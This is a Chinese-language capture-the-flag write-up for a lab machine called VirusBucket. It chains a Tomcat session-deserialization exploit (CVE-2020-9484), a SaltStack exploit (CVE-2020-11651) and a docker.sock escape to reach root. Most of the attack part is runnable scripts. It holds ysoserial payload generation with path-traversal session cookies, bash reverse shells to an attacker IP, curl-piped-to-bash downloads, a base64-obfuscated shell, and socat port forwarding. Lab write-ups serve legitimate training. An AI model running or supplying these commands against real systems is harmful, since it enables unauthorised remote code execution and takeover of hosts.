基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV 10.10.10.205

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 14:10 CST
Nmap scan report for 10.10.10.205
Host is up (0.068s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
4567/tcp filtered tram
6666/tcp open     zmtp        ZeroMQ ZMTP 2.0
7676/tcp open     imqbrokerd?
8080/tcp open     http        Apache Tomcat 9.0.27
|_http-title: VirusBucket
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.39 seconds

8080

是以个恶意软件分析平台,可以上传

CVE-2020-9484

注意tomcat的版本。9.0.27,这个版本有一个反序列化漏洞,参考:

我们可以上传恶意session,但首先需要知道要知道文件上传路径,前面报错得到的是缓存路径,不是实际路径。

文件名使用一个点,报错信息得到上传路径:

exploit & user flag

之后就是反序列化一把梭:

user.txt

得到shell,读取user.txt:

payload.sh

1
2
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.15/4444 0>&1"

script.sh

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "curl 10.10.14.15:7778/payload.sh -o /tmp/payload.sh" > miao.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/miao' -F 'image=@miao.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/miao'

java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmod.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/chmod' -F 'image=@chmod.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/chmod'

java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "bash /tmp/payload.sh" > bash.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/bash' -F 'image=@bash.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/bash'

one.sh

也可以直接一次session得到shell,只要针对java的Runtime.exec进行编码即可:

1
2
3
4
5
6
#!/bin/bash
cmd="bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'"
command="bash -c {echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"
java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections4 "$command" > ./one.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/one' -F 'image=@one.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/one'

信息搜集

查看端口发现本地两个端口,4505和4506:

1
2
3
4
5
netstat -anp
...
tcp        0      0 127.0.0.1:4505          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:4506          0.0.0.0:*               LISTEN      -
...

搜索相关信息知道是saltstack,存在一个漏洞CVE-2020-11651

端口转发

传个socat上去,进行端口转发:

1
2
3
wget 10.10.14.15:7778/socat
chmod +x socat
./socat TCP-LISTEN:4609,fork,reuseaddr TCP:127.0.0.1:4506

exploit

然后就是exp直接打:

1
python3 exploit.py --master 10.10.10.205 --port 4609 --exec "curl 10.10.14.15:7778/payload1.sh | bash"

得到docker容器的root:

payload1.sh

1
2
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.15/4445 0>&1"

提权信息

发现一个/var/run/docker.sock,容器可以通过这个socket来跟宿主机的docker服务通信:

之后就是可以通过api,也可以直接把宿主机的docker二进制文件传到容器内操作

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 宿主机
tomcat@VirusBucket:/usr/bin$ python3 -m http.server 6789

# 容器内
wget 172.17.0.1:6789/docker
chmod +x docker
python3 -c 'import pty; pty.spawn("/bin/sh")'

./docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
sandbox             latest              a24bb4013296        3 months ago        5.57MB
<none>              <none>              188a2704d8b0        4 months ago        1.06GB

./docker run -v /root:/mnt -it sandbox

root flag

挂载目录读取root.txt:

参考资料